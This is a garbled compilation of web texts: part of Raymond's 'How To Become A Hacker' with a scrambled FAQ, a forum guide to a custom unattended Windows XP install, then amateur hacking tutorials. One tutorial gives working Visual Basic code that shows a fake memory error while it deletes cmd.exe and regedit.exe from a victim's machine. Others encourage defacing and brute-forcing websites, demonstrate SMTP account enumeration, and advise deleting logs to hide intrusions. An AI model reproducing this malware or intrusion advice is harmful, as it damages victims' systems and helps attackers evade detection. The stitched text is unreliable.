Yes, there are other operating systems in the world besides Unix. But they're distributed in binary --- you can't read the code, and you can't modify it. Trying to learn to hack on a Microsoft Windows machine or under MacOS or any other closed-source system is like trying to learn to dance while wearing a body cast.

Under OS/X it's possible, but only part of the system is open source --- you're likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple's proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.

Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers still aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.)

So, bring up a Unix --- I like Linux myself but there are other ways (and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker.

For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.

To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation. From a new user's point of view, all Linux distributions are pretty much equivalent.

You can find BSD Unix help and resources at www.bsd.org.

I have written a primer on the basics of Unix and the Internet.

(Note: I don't really recommend installing either Linux or BSD as a solo project if you're a newbie. For Linux, find a local Linux user's group and ask for help.)

3. Learn how to use the World Wide Web and write HTML.

Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit is changing the world. For

this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.

This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; here's one.)

But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge --- very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).

To be worthwhile, your page must have content --- it must be interesting and/or useful to other hackers. And that brings us to the next topic?

4. If you don't have functional English, learn it.

As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.

This is very true. Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).

Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It's an example worth following.

Status in the Hacker Culture

Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.

Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (now gradually decaying but still potent) against admitting that ego or external validation are involved in one's motivation at all.

Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.

There are basically five kinds of things you can do to be respected by hackers:

1. Write open-source software

The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.

(We used to call these works 'free software', but this confused too many people who weren't sure exactly what 'free' was supposed to mean. Most of us, by at least a 2:1 ratio according to web content analysis, now prefer the term 'open-source' software).

Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.

2. Help test and debug open-source software

They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance.

If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on.

3. Publish useful information

Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.

Maintainers of major technical FAQs get almost as much respect as open-source authors.

4. Help keep the infrastructure working

The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs done to keep it going --- administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.

People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.

5. Serve the hacker culture itself Finally, you can serve and propagate the culture itself (by, for example, writing an accurate

primer on how to become a hacker :-)). This is not something you'll be positioned to do until you've been around for while and become well-known for one of the first four things.

The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.

The Hacker/Nerd Connection

Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being a social outcast helps you stay concentrated on the really important things, like thinking and hacking.

For this reason, many hackers have adopted the label 'nerd' and even use the harsher term 'geek' as a badge of pride --- it's a way of declaring their independence from normal social expectations. See The Geek Page for extensive discussion.

If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the 1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover and spouse material.

If you're attracted to hacking because you don't have a life, that's OK too --- at least you won't have trouble concentrating. Maybe you'll get a life later on.

Points For Style

Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.

• Learn to write your native language well. Though it's a common stereotype that programmers can't write, a surprising number of hackers (including all the most accomplished ones I know of) are very able writers.

• Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).

• Study Zen, and/or take up martial arts. (The mental discipline seems similar in important ways.)

• Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.

• Develop your appreciation of puns and wordplay.

The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're connected with a mix of left- and right-brain skills that seems to be important; hackers need to be able to both reason logically and step outside the apparent logic of a problem at a moment's notice.

Work as intensely as you play and play as intensely as you work. For true hackers, the boundaries between "play", "work", "science" and "art" all tend to disappear, or to merge into a high-level creative playfulness. Also, don't be content with a narrow range of skills. Though most hackers self-describe as programmers, they are very likely to be more than competent in several related skills --- system administration, web design, and PC hardware troubleshooting are common ones. A hacker who's a system administrator, on the other hand, is likely to be quite skilled at script programming and web design. Hackers don't do things by halves; if they invest in a skill at all, they tend to get very good at it.

Finally, a few things not to do.

• don't use a silly, grandiose user ID or screen name.

• don't get in flame wars on Usenet (or anywhere else).

• don't call yourself a 'cyberpunk', and don't waste your time on anybody who does.

• don't post or email writing that's full of spelling errors and bad grammar.

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories --- it could take you years to live your early blunders down enough to be accepted.

The problem with screen names or handles deserves some amplification. Concealing your identity behind a handle is a juvenile and silly behavior characteristic of crackers, warez d00dz, and other lower life forms. Hackers don't do this; they're proud of what they do and want it associated with their real names. So if you have a handle, drop it. In the hacker culture it will only mark you as a loser.

Other Resources

Peter Seebach maintains an excellent Hacker FAQ for managers who don't understand how to deal with hackers. If Peter's site doesn't respond, the following Excite search should find a copy.

There is a document called How To Be A Programmer that is an excellent complement to this one. It has valuable advice not just about coding and skillsets, but about how to function on a programming team.

I have also written A Brief History Of Hackerdom.

I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even more directly in its sequel Homesteading the Noosphere.

Rick Moen has written an excellent document on how to run a Linux user group.

Rick Moen and I have collaborated on another document on How To Ask Smart Questions. This will help you seek assistance in a way that makes it more likely that you will actually get it.

If you need instruction in the basics of how personal computers, Unix, and the Internet work, see The Unix and Internet Fundamentals HOWTO.

When you release software or write patches for software, try to follow the guidelines in the Software Release Practice HOWTO.

If you enjoyed the Zen poem, you might also like Rootless Root: The Unix Koans of Master Foo.

Frequently Asked Questions

Q:

Will you teach me how to hack?

A:

Since first publishing this page, I've gotten several requests a week (often several a day) from people to "teach me all about hacking". Unfortunately, I don't have the time or energy to do this; my own hacking projects, and traveling as an open-source advocate, take up 110% of my time.

Even if I did, hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you beg to be spoon-fed everything they know.

Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with specific questions.

If you do email a hacker asking for advice, here are two things to know up front. First, we've found that people who are lazy or careless in their writing are usually too lazy and careless in their thinking to make good hackers --- so take care to spell correctly, and use good grammar and punctuation, otherwise you'll probably be ignored. Secondly, don't dare ask for a reply to an ISP account that's different from the account you're sending from; we find people who do that are usually thieves using stolen accounts, and we have no interest in rewarding or assisting thievery.

Q:

How can I get started, then?

A:

The best way for you to get started would probably be to go to a LUG (Linux user group) meeting. You can find such groups on the LDP General Linux Information Page; there is probably one near you, possibly associated with a college or university. LUG members will probably give you a Linux if you ask, and will certainly help you install one and get started.

Q:

When do you have to start? Is it too late for me to learn?

A:

Any age at which you are motivated to start is a good age. Most people seem to get interested between ages 15 and 20, but I know of exceptions in both directions.

Q:

How long will it take me to learn to hack?

A:

That depends on how talented you are and how hard you work at it. Most people can acquire a respectable skill set in eighteen months to two years, if they concentrate. don't think it ends there, though; if you are a real hacker, you will spend the rest of your life learning and perfecting your craft.

Q:

Are Visual Basic or C# good languages to start with?

A:

If you're asking this question, it almost certainly means you're thinking about trying to hack under Microsoft Windows. This is a bad idea in itself. When I compared trying to learn to hack under Windows to trying to learn to dance while wearing a body cast, I wasn't kidding. don't go there. It's ugly, and it never stops being ugly.

There are specific problems with Visual Basic and C#; mainly that they're not portable. Though there are prototype open-source implementations

of these languages, the applicable ECMA standards don't cover more than a small set of their programming interfaces. On Windows most of their library support is proprietary to a single vendor (Microsoft); if you aren't extremely careful about which features you use --- more careful than any newbie is really capable of being --- you'll end up locked into only those platforms Microsoft chooses to support. If you're starting on a Unix, much better languages with better libraries are available.

Visual Basic is especially awful. Like other Basics it's a poorly-designed language that will teach you bad programming habits. No, don't ask me to describe them in detail; that explanation would fill a book. Learn a well-designed language instead.

One of those bad habits is becoming dependent on a single vendor's libraries, widgets, and development tools. In general, any language that isn't fully supported under at least Linux or one of the BSDs, and/or at least three different vendors' operating systems, is a poor one to learn to hack in.

Q:

Would you help me to crack a system, or teach me how to crack?

A:

No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this kind that I get will be ignored or answered with extreme rudeness.

Q:

How can I get the password for someone else's account?

A:

This is cracking. Go away, idiot.

Q:

How can I break into/read/monitor someone else's email?

A:

This is cracking. Get lost, moron.

Q:

How can I steal channel op privileges on IRC?

A:

This is cracking. Begone, cretin.

Q:

I've been cracked. Will you help me fend off further attacks?

A:

No. Every time I've been asked this question so far, it's been from some poor sap running Microsoft Windows. It is not possible to effectively secure Windows systems against crack attacks; the code and architecture simply have too many flaws, which makes securing Windows like trying to bail out a boat with a sieve. The only reliable prevention starts with switching to Linux or some other operating system that is designed to at least be capable of security.

Q:

I'm having problems with my Windows software. Will you help me?

A:

Yes. Go to a DOS prompt and type "format c:". Any problems you are experiencing will cease within a few minutes.

Q:

Where can I find some real hackers to talk with?

A:

The best way is to find a Unix or Linux user's group local to you and go to their meetings (you can find links to several lists of user groups on the LDP site at ibiblio).

(I used to say here that you wouldn't find any real hackers on IRC, but I'm given to understand this is changing. Apparently some real hacker communities, attached to things like GIMP and Perl, have IRC channels now.)

Q:

Can you recommend useful books about hacking-related subjects?

A:

I maintain a Linux Reading List HOWTO that you may find helpful. The Loginataka may also be interesting.

For an introduction to Python, see the introductory materials on the Python site.

Q:

Do I need to be good at math to become a hacker?

A:

No. While you do need to be able to think logically and follow chains of exact reasoning, hacking uses very little formal mathematics or arithmetic.

In particular, you won't need trigonometry, calculus or analysis (we leave that stuff to the electrical engineers :-)). Some grounding in finite mathematics (including Boolean algebra, finite-set theory, combinatorics, and graph theory) can be helpful.

Q:

What language should I learn first?

A: XHTML (the latest dialect of HTML) if you don't already know it. There are a lot of glossy, hype-intensivebad HTML books out there, and distressingly few good ones. The one I like best is HTML: The Definitive Guide.

But HTML is not a full programming language. When you're ready to start programming, I would recommend starting with Python. You

will hear a lot of people recommending Perl, and Perl is still more popular than Python, but it's harder to learn and (in my opinion) less well designed.

C is really important, but it's also much more difficult than either Python or Perl. don't try to learn it first.

Windows users, do not settle for Visual Basic. It will teach you bad habits, and it's not portable off Windows. Avoid.

Q:

What kind of hardware do I need?

A:

It used to be that personal computers were rather underpowered and memory-poor, enough so that they placed artificial limits on a hacker's learning process. This stopped being true some time ago; any machine from an Intel 486DX50 up is more than powerful enough for development work, X, and Internet communications, and the smallest disks you can buy today are plenty big enough.

The important thing in choosing a machine on which to learn is whether its hardware is Linux-compatible (or BSD-compatible, should you choose to go that route). Again, this will be true for most modern machines. The only real sticky area is modems; some machines have Windows-specific hardware that won't work with Linux.

There's a FAQ on hardware compatibility; the latest version is here.

Q:

I want to contribute. Can you help me pick a problem to work on?

A:

No, because I don't know your talents or interests. You have to be self-motivated or you won't stick, which is why having other people choose your direction almost never works.

Try this. Watch the project announcements scroll by on Freshmeat for a few days. When you see

one that makes you think "Cool! I'd like to work on that!", join it.

This seems unlikely --- so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be open-source after it's done. And, no matter how much "free" software gets written, there always seems to be more demand for new and customized applications. I've written more about this at the Open Source pages.

Q:

Do I need to hate and bash Microsoft?

A:

No, you don't. Not that Microsoft isn't loathsome, but there was a hacker culture long before Microsoft and there will still be one long after Microsoft is history. Any energy you spend hating Microsoft would be better spent on loving your craft. Write good code --- that will bash Microsoft quite sufficiently without polluting your karma.

Q:

How can I get started? Where can I get a free Unix?

A:

Q: Elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now?

But won't open-source software leave programmers unable to make a living?

A:

How to make your own Windows XP written

Of course everyone has different needs and will remove accordingly, or not remove anything at all. A couple explanations: - I leave Outlook Express only because I frequently use .mht files and removing Outlook Express breaks support for them. - I remove everything that is related to the Security Center, firewall. I don't need that since I'm using Kerio Personal Firewall and don't need an extra service running (and taking up the space) just to tell me my firewall, anti virus and Automatic Updates are On/Off. - Search Assistant is needed in my case because I have set up the search in XP exactly to my liking.

I thought about writing up my own experience about customizing and making an uA (unattended) install of my Windows XP SP2 in the past but kept putting it off thinking no one would even be interested. Well I recently talked with one of the RMs about nLite and not long ago posted a bit about it in Software Support then got a PM asking me about it. So I said to myself why not, maybe someone will find it useful after all. First off something like this isn't all that uncommon and an uA version esp. made for NXS has been around for a while. Think of this as my own version of that, although I started from zero. The software I use to make my own version: nLite (Framework .NET is needed but one (I do) can also use just the runtimes made esp. for nLite) Universal Silent Switch Finder (simplifies the task of finding out which installer a certain application uses) And of course Windows XP Pro with SP2 already slipstreamed. I make a folder named XPCD on my HDD and copy the content of the XP SP2 CD there. I also make two additional folders, Drivers in which I put all the drivers I'll be integrating and $OEM$ which is where all my additional tweaks, programs,... are. For some additional information about $OEM$ folders and their structure take a look at http://unattended.msfn.org/global/oemfolders.htm Open up nLite and am presented with these options (all of which except the “Integrate a Service Pack” I check, I obviously don't have any need for that):

Proceed by clicking next then I browse to my XPCD folder and the fun starts. “Remove Components” is next up. There I obviously, well start removing components that I don't need and end up with something like this:

- the reason I leave NetShell Cmd-Tool is because in my uA install I remove the DHCP service and use static IPs. That tool does not only let me do that but let's me set my subnet mask, default gateway and DNS server addresses. Meaning once the install is complete I am online and joined to a workgroup (check “Unattended Setup” “Personal” tab for more details) immediately. BTW if anyone has a need to change their TCP/IP settings and doesn't want to reboot, this tool often comes in handy. - I also remove OOBE when dealing with Corporate versions of XP. There are others I leave/remove for peculiar reasons but the above are most common. Next up is “Unattended Setup” which lets you set personal settings in advance.

It's pretty self explanatory but this is what I do here: - “Information” tab I check Unattended Installation. - “General 1/2” tab I put in the CD-Key, switch Unattended Mode to FullUnattended and check Classic Theme (would end up with a classic one in any case since it's one of those services I remove). - “General 2/2” is untouched by me. - “Personal” tab I put in my Full Name, Computer Name, Workgroup, Language and Timezone. Just in case anyone is wondering I create an admin password once my XP install is complete. - “Display” tab I pick my desired color depth, screen resolution and refresh rate. Moving forward there's the “Integrate Drivers” feature

It lets you integrate various drivers. I for one integrate the drivers for my onboard sound card, both my NICs, SMBus and SATA. Once the SATA drivers are integrated there's no need to press F6 when installing all in the spirit of making it an uA install. Next there's the “Integrate Hotfixes” feature. It basically lets you slipstream all the hotfixes you see fit with Windows. That way when you install Windows you're installing a more secure version, no need to go to Windows Update right away. The hotfixes and instructions are available on RyanVM's Windows XP Post-SP2 Update Pack page http://www.ryanvm.net/msfn/updatepack.html

Clicking next takes us to “Options and Tweaks”.

There are several tweaks available there all I can say is read up on them and use the ones you find useful. I might also add that I use a regtweaks.reg file in addition to the tweaks available here. That file has numerous other tweaks I use in it.

After all is done I get this:

A much reduced version (only 218,29MB big) of Windows XP that does everything I want it to do. This is the end of nLite, I only on occasion use it to make an .iso but not before I copy the $OEM$ folder into the XPCD one. I say on occassion because I usually use CDIMAGE which is neatly integrated into my context menu. I'm attaching a programs.txt file with all the programs which are silently installed (or don't need to be installed) and which I'm currently using in my uA version (not all of the programs are the latest version, I'm aware of that, they will be in my next uA install). As you might have noticed by looking at that programs.txt I'm using a lot of F/OSS (free/open source software). With these exceptions: - Beyond Compare: haven't found a better alternative to it yet, well a free one. There are actually quite a few available but none has the context integration this one offers, so I'm still looking. - mIRC: have bought a copy. - Nero: am using an OEM version. - PhotoStitch: am also using an OEM version. I really don't use any other program with the exception of Photoshop/Imageready which I don't install uA since they take up too much space. I might also note that using GIMP as an alternative just won't do for me. So out of all the software I need and actually use two are unpaid for, yes I have a couple of legit XP copies. The switches for silently installing all those applications are quite easily available and USSF will also help you out quite a bit there. Before I have to install Windows again I always update the programs and some of the settings. For example I also update my Thunderbird profile folder so it includes the latest address book and all e-mails I need. Same with Firefox, I make sure all my latest bookmarks, settings and the latest versions of extensions are included.

There are numerous other things I do to customize my uA XP but will only mention a few. Once the install completes I have my FTP and HTTP servers up and running in full working order. The FTP server comes with all the settings, users. My HTTP server comes not only with all the files I want to share with the rest but with PHP, ASP, Perl, coppermine, phpMyAdmin and some additional features. My TightVNC server runs on a predefined port and has it's password set. Miranda IM has all of my contacts and is also automatically connected online. I add/remove various things to my Windows Explorer context menu, adjust all of it's icons in addition I label all my HDD partitions, tweak my QuickLaunch, Start menu, desktop and general appearance, the hot keys on my Microsoft keyboard are set precisely how I want them to be, mIRC comes with all the scripts and connects to all the networks/channels,... As I said before I remove a lot of components and among them are also services, for which I also specify if they are on automatic, manual, disabled. Here's how they look at first boot of Windows.

This is a "short" description of my uA/customised Windows XP SP2. I may or may not add more in the future. To be shure check: http://ccucu.com

Visual Basic 6 – Creating a Simple Virus

Now many of you feel that creating a virus is impossible especially for you beginners. Well this tutorial shows you how to create a simple virus with just a few lines of code. A virus can be an application that deletes files upon request, this is seen as infecting your computer because by deleting key files you may need to take action to get your computer back to normal.

First of all open a new Visual Basic project, a standard exe file..

Now it depends on how you want your virus to work, I feel it is best if it is activated once your application is opened so the main code codes in the form load sub.

On your project insert a text box , a command button and a timer, we will be using the command button and timer a little later on.

In the project put in the file you want to delete, for example if you wanted to delete the command file then you would put the following code in the form load tab.

Private Sub Form_Load() Text1.Text = “C:/Windows/System32/cmd.exe Kill Text1.Text End Sub

Once the project is opened then the command file will be removed.

Now I will show you an example of doing this using a command button. Put the following code in the command button and in the form load.

You can even give the text box a name to make it quicker. I have labelled it ‘A’

Private Sub Form_Load() Text1.Text = “C/Windows/System32/cmd.exe” A = Text1.Text End Sub

Private Sub Command1_Click Kill A End Sub

Now once the command button is clicked on the project the command file will be deleted.

Now we will use the timer in this one. If you want to disguise your scheme then this is a good way to do it, Here we will send a fake message error pretending the application hasn’t got enough memory to run, but in actual fact the victim doesn’t know that you have just removed their command file.

Here is to go about it…

Private Sub Form_Load() Form1.Visible = False Text1.Text = “C:/Windows/System32/cmd.exe” A = Text1.Text Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error” End Sub

Private Sub Timer1_Timer() Timer1.Interval = 5000 Kill A Timer1.Enabled = False End Sub

All we have done above is made the form invisible so that it makes the error message look real, we have set an interval of 5 seconds on the timer before the file is deleted and that’s how simple it can be to fool someone.

Right, we can now make it a little more difficult if you are finding the above a little too easy.

How about removing more than 1 file, well this is how you could go about doing that, we will stick with the message box fool because I think that works well.

The example below shows how to remove the files when the application is loaded, we will not be using timers or command buttons in this one. We will not even be using text boxes because they are not needed, you can just do what is shown below.

So in the form load part put the following code.

Private Sub Form_Load() Form1.Visible = False Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error” Kill “C:/Windows/System32/cmd.exe” Kill “C:/Windows/regedit.exe” End Sub

So above we will be removing the command file and the registry, I don’t think the victim will be best pleased about that do you.

Now I have shown you the above information I think it’s your turn to try and create your own, now you can test it on your own pc, just copy a file, lets say the cmd.exe file and paste it into your C:/

Then put in the code above but in the Kill put this…

Kill “C:/cmd.exe”

That’s all you need to kill, then you will see the file has been removed. Keep trying new things like I have shown and you will be a pro in no time.

Hacking a webpage

This is just an intro tutorial to web page hacking made for newbies !

1)Intro First of all,why you want to hack a webpage?Is it a certain webpage or any site at all? There are many reasons to hack a website, or a webmaster.Maybe you want to take a revenge or maybe you want to have fun or just learn how to do it ! You can deface the website which means replace the original index with a new one or you can gain access to the member area of the site which might be easier. 2)DEFACE:You can deface the site through telnet or your browser by running remote commands on an old or misconfigured server, the hard thing to do is find an old server , maybe a network of a school or university would do,get a CGI BUG searcher.This program will scan ranges of IPs for web-servers and will scan them for known bugs in their cgis or other bugs and holes.You can learn how to exploite a certain hole by adding in yahoo the name of the bug/hole and the word exploit,search for "cmd.exe exploit".There are more than 700 holes that many servers might have! You can also deface a website by finding the ftp password and just browse through the sites ftp and replace the index.htm.You do that with the : 3)BRUTE FORCE ATTACK :To do that you need a brute forcer or brute force attacker and some word lists,the brute forcer sends multiple user/pass requests of words that picks up from namelists and tries to hack the account untill it does! So lets say imagine a porn site that asks for a password , you go there you copy their address , you add the address in a program called brute forcer and then from the brute forcer you choose

a text file with names to be used as usernames and a text with names to be used as passwords,the brute forcer will try untill it finds a correct user/pass This should be easier for the newbies than exploiting cgi bugs , many of the newbies havent even heard of it i hope i didnt confuse you with this tutorial there might be more tuts about web hacking and cgi bugs and such.Till then try to find the way to cgi bugs yourself with the cgi scanners in the Web Hacks section or download a brute forcer to crack accounts.

Telnet - A Tutorial to Telnet and Hacking

Now you may be looking at this going, "What the hell is Telnet?". If you are, don't worry, I'll explain everything. First of all, Telnet is software that allows you to connect to another Telnet Host.

In windows systems Telnet is usually called Telnet32.exe or Telnet.exe. In newer versions of windows it is Telnet32.exe. *** Note to Windows XP users: Don't go and get the old version of Telnet, because you have a DOS-Based one. I'll give commands along this guide so you can enjoy it too. You have to either run "Telnet" or "cmd" and then "Telnet".

Telnet is not illegal and is used by thousands of remote computers to interchange data, share connections, and do many other things that would be impossible without it.

The default port for Telnet is port 23. When I say for instance, 'Connect to the sys' I am referring to connecting on the system's default port for Telnet. Sometimes you can't determine a port so you will have to port scan a sys to find the Telnet Ports.

Port 25 is the 'Sendmail Protocol' port. We will be dealing with this port as well.

Telnet Security

Because there are so many problems with Telnet today involving cyber crime and hacking, SysAdmins often restrict anonymous use of their sys's Telnet Proxies. This is cheap and can be bypassed easily.

Most SysAdmins are amatures at what they do and make me laugh. They restrict the Telnet proxies on port 23 and think that we can't telnet to other ports such as 81 and 25 because we can't use the Telnet Proxy. Well they are wrong. We can easily do it and we will. Let me point out a system that has this and was not effective. I will star out the IP for privacy.

Welcome to Microsoft Telnet. Telnet32.exe. o <to> 202.232.**.** connecting to 202.232.**.** 23 (The port number) Connected. Connection to host lost (unauthorized use of Telnet Proxy(ies). o <to> 202.232.**.** 25 Connecting to 202.232.**.** 25 (Watch this..) Welcome to ********.net Sendmail Program. Welcome to all staff. vrfy bin ..550 <bin@********.net> vrfy sys ..550 <sys@********.net> vrfy root ..550 <root********.net> vrfy admin ..550 <admin@********.net> vrfy games ..550 <games@********.net> vrfy uucp ..550 <uucp@********.net> q ..550 <command not recognized> c Connection to host lost on command.

Ok people is there a problem there? How many addys did I get? Am I supposed to have those? Do I care? No. I am just demonstrating how

sh1tty Unix-System security is and how easy it is to use the Telnet Proxy to your advantage. Here, I wil list some commands for all of you running under DOS.

C - Close the Current Connection D - Display the sys's operating paremeters O - Connect to a host name (on default port 23) [port] q - Quit (Exit Telnet). Set- Set Options Send - Send data/strings to server

Telnet, as you know so far, is a very useful tool for hackers. Hell, if you can't connect to a computer, you can't hack it. Its that simple.

Now the best thing about Telnet is that virtually every Windows computer has it, comes with it, and is able to run it.

THINGS GOING WRONG ON HACKING OR TELNET

I have a Windows 98 computer and I am running Telnet. It gives me a lot more options when connecting to a computer, and these commands don’t go anywhere! What do I do? I get the hostname part and all that, just what does Term-Type mean?

Ok people, so many people have asked me this I'm ready to start getting an auto-flame response on my e-mail box LoL. Anyway, here goes:

Term Type means Terminal Type. It is the version of the Telnet Terminal that the host or server is running. You have to specify this, Telnet is not hacker-friendly.

In Windows 98/95/ME you are not running a DOS-Based version of Telnet. You get a client program, somewhat considered shit for me. I like the DOS based one and frankly, I find it a lot easier to use.

I can't connect to the host!

Well, the host either doesn't exist, does not support Telnet Packets or Connections, or is currently restricting proxy access or usage from your addy or all addresses.

I went further than you because I thought I knew what I was doing! I got this message saying my hacking attempt was logged! Am I going to go to jail!?!?!

Don’t worry, as long as its not with the extension .log or .hlog or .hacklog you're fine, as 95 percent of these messages are BS and lies.

IF THEY'RE LIES, how come they knew I was hacking them?

They don't. They simply search for incoming connections not recognized by the server. If the SysAdmins didn't modify the message, you would have gotten this:

"Error 229292: Data not recognized 8191: Distinct Remote Service Lost or Corrupt."

They just modified it. Breath in, breath out, relax.

My dad or mom found out I was hacking, and my dad's an expert on computers! He made it so I can't view anything on AOL. What the hell's going on! Give me a trick to evade this!

Sure thing. Connect to AOL, ping the site you're trying to view, and type in the IP address. You will get to the homepage, but this isn't that good a trick because you can't ping sub-addys and you're going to get text for the sub-urls. This might or might now work.

I was screwing around with my friends computer. I think I left my information somewhere, but where?

Usually, you have a critical system log. If you delete a system file (which unless you're 133t you'd NEVER EVER do) the computer's going to boot and give you a log of what happened before the deletion of the file so you know what went wrong. If you did happen to delete it, it will list something like "deletion from x.x.x.x. (your IP)". If it does, damn, you're busted. But there are ways of getting rid of this "hacker-knock out". First off, get a WAN-Controller, or any sort of program that lets you input screen or Hardware input by the output. This means you

can control their computer with yours. But you can't boot this computer, because it will break the connection.

Access the log files usually in system or system32 (both system files located in C:/Windows or C:/). There, you will see encrypted sh1t. CTRL+A will select it all and delete it all. If you do delete this file, (after you do), try recovering the system file. WHATEVER YOU DO DON'T DO A SYSTEM RESTORE, YOU HAVE BEEN WARNED.

Some hacker has my IP and hacks it every time I log on. It's static, which means it doesn't change. How do I make him stop? I don't know what his IP is, either!

Go to start, run, "netstat -a". Hacking is almost equivalent to connecting, if he's hacking you your connected to him and he's connected to you. Netstat -a is a command that allows you to see all your connections to hosts and servers, associated with TCP/IP. If you see a hostname that you don't recognize, log it. In fact, click Print Screen, go to paint, CTRL+V, Crop the image of the DOS window for Netstat, and save it. That should be quite easy.

How To Catch A Hacker

Tip 1: Hackers cover their tracks. Experienced hackers cover them more thorougly, but amateur hackers sometimes leave things behind. Don't expect them to leave any really big evidence behind; expect more of little things here and there you might find surprising. For example, if you're writing a term paper and a black hat hacker accidently saved it when he took a paragraph out- that's suspicious. Where did that paragraph go? Well, for one thing, now you know he was in that area. Check the folders surrounding the file- you might find something.

Tip 2: Decipher between the type of hackers that are attacking you. Experienced hackers will have a more in depth look around when they penetrate your system. They won't touch much because they know that that won't add too much to their knowledge. But if you know a hacker's been in, and some files are messed with, and you have a log of someone guessing passwords to a file or something of that sort, its probably some newbie who's just starting out. These are the easiest hackers to catch. They usually get so caught up in thoughts like "I'm in!" that they forget the basics, such as work behind a proxy.

